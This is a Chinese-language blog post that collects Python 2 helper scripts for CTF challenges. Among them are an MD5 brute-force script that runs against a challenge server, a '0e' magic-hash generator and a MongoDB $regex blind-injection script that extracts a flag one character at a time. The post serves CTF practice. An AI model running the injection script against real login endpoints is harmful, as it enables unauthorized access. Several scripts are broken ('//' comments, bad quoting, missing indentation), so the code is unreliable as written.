• 积累一点ctf需要掌握的常见脚本知识


    1.利用像素点还原图片。

     1 from PIL import Image
     2 import re
     3 if __name__ == '__main__':
     4     x = 887 //将像素点个数进行分解,可以确定图片的长宽
     5     y = 111
     6     i = 0
     7     j = 0
     8      
     9     c = Image.new("RGB", (x,y))
    10     file_object = open('ce.txt') //ce.txt中保存着像素点的坐标
    11      
    12     for i in range(0,  x): 
    13         for j in range(0,  y):
    14             line = file_object.next() //每次读取一个像素点
    15             lst = line.split(",") //lst生成一个元组
    16             c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))
    17      
    18     c.show()
    19     c.save("c.png")

    2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。

     1 #coding : utf8
     2 import requests
     3 import re
     4 import hashlib
     5 import itertools
     6 s = requests.session()  //建立一个session对话
     7 url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"
     8 data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}
     9 content = s.get(url=url,data=data)
    10 target = re.findall("sh">(.*)<",content.text) 
    11 target = target[0]
    12 poc = re.findall("code">(.*)<",content.text)
    13 str1 = poc[0]
    14 a = [''.join(x) for x in itertools.permutations(str1, 9)]  //join方法是通过指定的字符串来连接序列元素从而构成新字符串,permutations用来生成无重复字符的元组
    15 for i in range(0,len(a)):
    16 final = hashlib.md5(a[i])
    17 if final.hexdigest() == target:
    18 flag = s.get(url="http://106.75.67.214:2050/?code="+a[i])
    19 print flag.content
    20 print flag.headers

     3.利用py将base64编码的字符串还原成图片

    1 import os,base64   
    2 strs='''''sdasdas==''' //已经编码的base64字符串 
    3   
    4 imgdata=base64.b64decode(strs)  
    5 file=open('1.jpg','wb')  
    6 file.write(imgdata)  
    7 file.close() 

     4.生成0e哈希值:

     1 #coding:utf-8
     2 import hashlib
     3 import itertools
     4 def go():
     5     payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"]
     6     i = 0
     7     print payload
     8     for j in itertools.product(payload,repeat=30): #repeat参数指定长度
     9         payloads = "".join(j)
    10         #print pow
    11         #i = i+ 1
    12         #if i == 10:
    13         #    break
    14         str1 = hashlib.md5(payloads).hexdigest + "SALT"
    15         str2 = hashlib.md5(str1)
    16         if (str2[0]=="0") & (str2[1]=="e") & (str2[2:].isdigit()):
    17             print payloads
    18 go()

    5.mongodb基于正则注入:

     1 #coding:utf-8
     2 import requests
     3 import string
     4 # print string.ascii_letters
     5 # print string.digits
     6 flag = "c1ctf{"
     7 payload = string.ascii_letters + string.digits
     8 
     9 url = "http://xx.x.x.x/index.php?"
    10 restsrt = True
    11 while restsrt:
    12     restsrt = False
    13     for i in payload:
    14         payloads = flag + i
    15         post_data = {"username":"admin","passwd[$regex]":flag+".*"}
    16         #post_data = {"username":"admin","passwd[$regex]":"^"+flag}
    17         r = requests.get(url = url,data = post_data,allow_redirects = False)
    18         if r.status_code == "302":
    19             print payloads
    20             flag = flag + i
    21             restsrt =True
    22             if i == "}":
    23                 exit(0)
    24             break
    25         

    6.多次压缩打包

     1 #coding:utf-8
     2 import tarfile
     3 for i in range(1,2):
     4     tfile = tarfile.open("shell0.tar.gz","w:gz") #打包压缩
     5     tfile.add("flag.py")
     6     tfile.close()
     7 
     8 for i in range(1,300):
     9     tfile = tarfile.open("shell"+str(i)+".tar.gz","w:gz")
    10     tfile.add("1.php")
    11     tfile.add("shell"+str(i-1)+".tar.gz")
    12     tfile.close()

    7.多次解压:

    1 #coding:utf-8
    2 import tarfile
    3 for i in range(1,300)[::-1]:
    4     file = tarfile.open("shell"+str(i)+"tar.gz")
    5     file.extractall()
    6     file.close()
  • 相关阅读:
    Android中Intent传递对象的两种方法(Serializable,Parcelable)
    Android安全机制(2) Android Permission权限控制机制
    Android TextView中文字通过SpannableString来设置超链接、颜色、字体等属性
    finder怎么才能找到library
    Mac下Android Studio中获取SHA1和MD5
    andorid 自定义seekbar
    C# Sending data using GET or POST ZZ
    gmail
    load dll
    C# Read/Write another Process' Memory ZZ
  • 原文地址:https://www.cnblogs.com/tr1ple/p/6067414.html
Copyright © 2020-2023  润新知